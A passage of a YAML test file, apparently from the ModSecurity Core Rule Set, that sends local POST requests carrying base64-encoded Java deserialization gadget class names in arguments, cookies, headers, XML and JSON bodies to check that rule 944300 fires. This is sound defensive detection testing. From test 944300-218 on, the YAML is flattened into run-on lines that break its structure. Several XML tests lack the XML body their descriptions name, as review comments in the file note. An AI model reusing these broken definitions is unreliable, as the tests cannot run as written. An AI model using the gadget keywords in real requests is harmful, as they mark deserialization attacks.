            method: "POST"
            version: "HTTP/1.0"
            data: "aW52b2tlcnRyYW5zZm9ybWVy=test"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-200
    desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-201
    desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-202
    desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: aW52b2tlcnRyYW5zZm9ybWVy
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): desc names the keyword, but data is only "element_value", so the
  # request body carries no keyword; the XML markup looks lost from this copy.
  # Confirm the body against upstream before relying on this test.
  - test_title: 944300-203
    desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): Content-Type is application/xml but data is the bare keyword with
  # no XML elements around it; confirm the intended XML body.
  - test_title: 944300-204
    desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "aW52b2tlcnRyYW5zZm9ybWVy"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): data is identical to the non-nested case above (bare keyword, no
  # nesting visible); confirm the intended nested XML body.
  - test_title: 944300-205
    desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "aW52b2tlcnRyYW5zZm9ybWVy"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-206
    desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=aW52b2tlcnRyYW5zZm9ybWVy"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-207
    desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-208
    desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}"
          output:
            log_contains: "id \"944300\""

  # Keyword Gludm9rZXJ0cmFuc2Zvcm1lcg: base64 text of "invokertransformer" when one
  # byte precedes it in the encoded stream.
  - test_title: 944300-209
    desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-210
    desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-211
    desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-212
    desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-213
    desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: Gludm9rZXJ0cmFuc2Zvcm1lcg
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): desc names the keyword, but data is only "element_value", so the
  # request body carries no keyword; the XML markup looks lost from this copy.
  # Confirm the body against upstream before relying on this test.
  - test_title: 944300-214
    desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): Content-Type is application/xml but data is the bare keyword with
  # no XML elements around it; confirm the intended XML body.
  - test_title: 944300-215
    desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "Gludm9rZXJ0cmFuc2Zvcm1lcg"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): data is identical to the non-nested case above (bare keyword, no
  # nesting visible); confirm the intended nested XML body.
  - test_title: 944300-216
    desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "Gludm9rZXJ0cmFuc2Zvcm1lcg"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-217
    desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg"
          output:
            log_contains: "id \"944300\""
- test_title: 944300-218 desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" output: log_contains: "id \"944300\"" - test_title: 944300-219 desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-220 desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=BpbnZva2VydHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-221 desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "BpbnZva2VydHJhbnNmb3JtZXI=test" 
output: log_contains: "id \"944300\"" - test_title: 944300-222 desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-223 desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-224 desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: BpbnZva2VydHJhbnNmb3JtZXI method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-225 desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: 
input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-226 desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BpbnZva2VydHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-227 desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BpbnZva2VydHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-228 desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=BpbnZva2VydHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-229 desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" output: log_contains: "id \"944300\"" - test_title: 944300-230 desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-231 desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" 
data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-232 desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" output: log_contains: "id \"944300\"" - test_title: 944300-233 desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-234 desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-235 desc: "Request header test includes keyword 
cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-236 desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-237 desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-238 desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-239 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-240 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" output: log_contains: "id \"944300\"" - test_title: 944300-241 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" 